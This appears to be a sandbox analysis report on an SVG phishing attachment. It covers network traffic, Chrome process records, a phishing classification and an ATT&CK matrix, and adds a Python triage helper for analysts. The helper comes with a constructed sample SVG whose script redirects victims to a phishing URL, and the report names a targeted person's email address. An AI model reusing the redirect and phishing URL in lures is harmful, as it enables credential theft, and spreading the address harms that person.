    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3546sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: SecureMessageatt.svg | String found in binary or memory: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg==
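    Added example (not Joe Sandbox code, and not the attachment's actual script): a triage helper for SVG lures of this kind. The report shows two places where the victim is identified: the last path segment of the coxmotec.com URL embedded in the SVG is base64 for zachary.adkins@rrc.texas.gov, and the same address reappears in clear text as the workers.dev `?qrc=` parameter. The helper pulls URLs out of the SVG's `<script>` elements, rebuilds string literals that were split with `+` (a cheap evasion against grepping the raw file), and decodes base64 path segments or query values back to the identifier. SAMPLE_SVG is constructed to mimic the redirect the AI verdicts describe; the real file's script is not reproduced in this report, so its exact shape is an assumption.

```python
"""Triage helper for SVG phishing lures like the one in this report.

Added example; not Joe Sandbox code and not the submitted file's actual
script. SAMPLE_SVG is constructed to mimic the behaviour the AI verdicts
describe: an inline <script> that redirects the browser to the coxmotec.com
URL, with the URL split across two string literals.
"""
import base64
import binascii
import re
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample, not the real attachment.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <script type="text/javascript"><![CDATA[
    var d = "https://coxmotec.com/wp-includes/js/" +
            "emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg==";
    window.location.href = d;
  ]]></script>
</svg>
"""

SVG_NS = "{http://www.w3.org/2000/svg}"
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Only plausible base64 tokens: long, standard alphabet, optional padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
# JS tokenizer: double-quoted literal, single-quoted literal, '+', any other char.
JS_TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\+)|(\S)')


def script_bodies(svg_text: str) -> list:
    """Text of every <script> element, namespaced or bare (CDATA is unwrapped by the parser)."""
    root = ET.fromstring(svg_text)
    return ["".join(el.itertext()) for el in root.iter()
            if el.tag in (SVG_NS + "script", "script")]


def concatenated_strings(js: str) -> list:
    """Rebuild string literals joined with '+', so a URL split in two is seen whole."""
    out, current, pending_plus = [], None, False
    for m in JS_TOKEN_RE.finditer(js):
        dq, sq, plus, _other = m.groups()
        literal = dq if dq is not None else sq
        if literal is not None:
            if current is not None and pending_plus:
                current += literal          # "a" + "b" -> "ab"
            else:
                if current is not None:
                    out.append(current)
                current = literal
            pending_plus = False
        elif plus is not None:
            pending_plus = True
        else:                               # any other token ends the chain
            if current is not None:
                out.append(current)
                current = None
            pending_plus = False
    if current is not None:
        out.append(current)
    return out


def extract_urls(svg_text: str) -> list:
    """Absolute URLs from script string literals and from href-like attributes."""
    urls = []
    for body in script_bodies(svg_text):
        for s in concatenated_strings(body):
            urls.extend(URL_RE.findall(s))
    for el in ET.fromstring(svg_text).iter():
        for name, value in el.attrib.items():
            if name.endswith("href") and value.startswith(("http://", "https://")):
                urls.append(value)
    return list(dict.fromkeys(urls))       # de-duplicate, keep order


def try_b64(token: str) -> Optional[str]:
    """Decode token as base64 if it looks like one and yields printable ASCII."""
    if not B64_RE.match(token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def victim_identifier(url: str) -> Optional[str]:
    """E-mail address carried in the URL: base64 in a path segment (coxmotec.com
    style) or plain/base64 in a query value (workers.dev ?qrc= style)."""
    parts = urlsplit(url)
    for seg in reversed(parts.path.split("/")):
        decoded = try_b64(seg)
        if decoded and EMAIL_RE.match(decoded):
            return decoded
    for values in parse_qs(parts.query).values():
        for v in values:
            if EMAIL_RE.match(v):
                return v
            decoded = try_b64(v)
            if decoded and EMAIL_RE.match(decoded):
                return decoded
    return None


def triage(svg_text: str) -> dict:
    """Map every extracted URL to the victim identifier it carries (or None)."""
    return {url: victim_identifier(url) for url in extract_urls(svg_text)}


if __name__ == "__main__":
    for url, ident in triage(SAMPLE_SVG).items():
        print(f"{url}\n  -> victim identifier: {ident}")
```

    Run against the constructed sample this yields the coxmotec.com URL mapped to zachary.adkins@rrc.texas.gov, which is the same pivot an analyst would use to find other copies of the lure (the base64 segment changes per recipient, the path prefix does not). The `+`-join handles only the simplest string splitting; the heavily obfuscated follow-on scripts the 1.13 and 1.97 verdicts describe need to be executed in an instrumented engine, which is what the sandbox run above did.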
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknown | HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir7788_1833153780
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir7788_1833153780
    Source: classification engine | Classification label: mal60.phis.winSVG@25/18@20/11
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104
    Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\SecureMessageatt.svg"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8
    Source: Window Recorder | Window detected: More than 3 window changes detected
    MITRE ATT&CK matrix, listed per tactic (techniques followed by a number in parentheses were matched by that many signatures):

    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names
    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server
    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
    Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron
    Persistence: Browser Extensions (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook
    Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook
    Defense Evasion: Masquerading (11), Process Injection (1), File Deletion (1), Binary Padding
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
    Discovery: System Service Discovery, Application Window Discovery, Query Registry, System Network Configuration Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
    Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
    Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (5), Ingress Tool Transfer (2)
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication
    Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction